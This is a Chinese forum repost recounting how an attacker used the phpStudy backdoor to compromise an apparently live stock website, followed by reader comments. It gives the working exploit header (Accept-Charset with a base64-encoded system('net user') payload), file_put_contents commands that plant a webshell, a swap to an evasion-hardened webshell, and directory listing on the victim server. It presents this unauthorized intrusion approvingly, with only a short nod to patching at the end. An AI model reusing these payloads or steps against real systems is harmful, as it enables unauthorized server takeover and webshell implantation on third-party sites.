好可怕!phpstudy漏洞被“黑客”在某股票网站上复现
近期通过相关欣慰报道phpstudy发现了安全漏洞,于是被黑客就利用了,国外一名黑客利用这个phpstudy中的代码执行的后门漏洞,对某股票网站进行了渗透。渗透过程如下:
利用某线上工具用搜索关键词去批量
http://p1.pstatp.com/large/pgc-image/e6cd3595db684fb4b17e36d6c12db20a
在搜索出来的网站中随便找了一个某票网站
网站是这个样子的
http://p1.pstatp.com/large/pgc-image/302388f32ce94d90b10d4277a2d984af
随后利用burp
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==
分别在请求包中添加利用的poc
http://p1.pstatp.com/large/pgc-image/6e68a25c37284e87adefe5e5be6c3f38
Accep-Charset后面的是base64编码
成功的执行了命令,于是想着拿webshell
http://p3.pstatp.com/large/pgc-image/717c7f20df274a50b1425c879071f2fc
通过file_put_contents()写入了一句话进去
$a = '';file_put_contents('8.php',$a);echo 'ok';
写入之后访问,它拦截了我的请求,然后我访问了正常的文件index.php并没有拦截
http://p9.pstatp.com/large/pgc-image/41e9a92173a844749ba33ad78f490807
查看了一下当前的目录,原来没写入到网站的目录下
http://p1.pstatp.com/large/pgc-image/b833e7f6e36e4e2e83341d918607e8f9
于是执行了system("cd PHPTutorial&dir");(由于burp回显太慢于是就换了一位师傅写的工具)
查看了PHPTutorial目录下的www,应该是没写入到网站当前的目录
http://p1.pstatp.com/large/pgc-image/811eb6454271412eba1db1a25ba01936
重新构造了语句再次写入
$a = '';file_put_contents('D:/phpStudy/PHPTutorial/www/8.php',$a);echo 'ok';
system("cd PHPTutorial/www&dir");查看一下www下的所有文件
http://p3.pstatp.com/large/pgc-image/f4ef439a096248eab6ded6356ec052d5
重新尝试写入,发现还是没有写入进去,应该有防护,我把一句话木马换成了免杀的,文件名改成了index1.php
$a = ‘’;file_put_contents(‘D:/phpStudy/PHPTutorial/WWW/index1,php’,$a);
http://p3.pstatp.com/large/pgc-image/7ad58e44efeb4a849e47365971d15549
发现成功的写入了进去
执行命令的时候发现当前的权限为administrator,可直接提权!!!
所以建议看到这篇文章的朋友,一定要检测是否用了phpstudy,一定要检测一下是否存在安全漏洞,如果存在尽快升级修复,保护好自身系统安全!!!
最后喜欢我文章的朋友请加圈子关注我们,私信关键词:加群。
就会自动分享给你群号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的“SaFeMAN”。
还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们。 转发了 似曾相识在哪里见过,然后这里就成了原创?[抠鼻][抠鼻][抠鼻] 生产环境用这玩意,真是大开眼界 PHPstudy都是本地用的,方便开发,上线谁用这玩意啊 漏洞利用。 看不懂[泪奔] hao 转发了 转发了
页:
[1]
2